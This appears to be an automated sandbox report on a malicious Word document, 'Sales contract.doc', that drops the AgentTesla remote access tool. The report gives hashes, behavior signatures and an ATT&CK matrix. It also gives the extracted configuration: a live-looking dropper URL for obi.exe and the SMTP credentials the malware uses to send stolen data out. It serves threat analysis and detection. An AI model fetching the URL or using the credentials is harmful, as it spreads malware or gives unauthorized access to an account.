Sales contract.doc

General
Target

Sales contract.doc

Size

295KB

Sample

210421-11lyrhlchj

Score
10 /10
MD5

452e11d23c80550a45b6a498bac85733

SHA1

1b1355594eecbfad9803e771bedefedf96ecceee

SHA256

8ac32b7faa79aabd51156f6503e624a53ee5d355d602784273376ad45e7dbdbf

SHA512

fcf7955fe9b6e84e6361a2e0beca3bce9a64d7f413c8629a877e37da016144c4c886ecbf0d61586233aecb15f9215ac0378fc5349ed127465904658af1a3f3a5

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

httP://katchobinnas.duckdns.org/obi.exe

Extracted

Family agenttesla
Credentials

Protocol: smtp

Host: us2.smtp.mailhostbox.com

Port: 587

Username: zhoubing.wu.zeruimetal@pppkglobal.net

Password: Thanks202#

Targets
Target

Sales contract.doc

MD5

452e11d23c80550a45b6a498bac85733

Filesize

295KB

Score
10 /10
SHA1

1b1355594eecbfad9803e771bedefedf96ecceee

SHA256

8ac32b7faa79aabd51156f6503e624a53ee5d355d602784273376ad45e7dbdbf

SHA512

fcf7955fe9b6e84e6361a2e0beca3bce9a64d7f413c8629a877e37da016144c4c886ecbf0d61586233aecb15f9215ac0378fc5349ed127465904658af1a3f3a5

Tags

Signatures

  • AgentTesla

    Description

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    Tags

  • Process spawned unexpected child process

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload

  • Blocklisted process makes network request

  • Downloads MZ/PE file

  • Executes dropped EXE

  • Loads dropped DLL

  • Suspicious use of SetThreadContext

Related Tasks

MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                  Privilege Escalation
                    Tasks

                    static1

                    behavioral2

                    10/10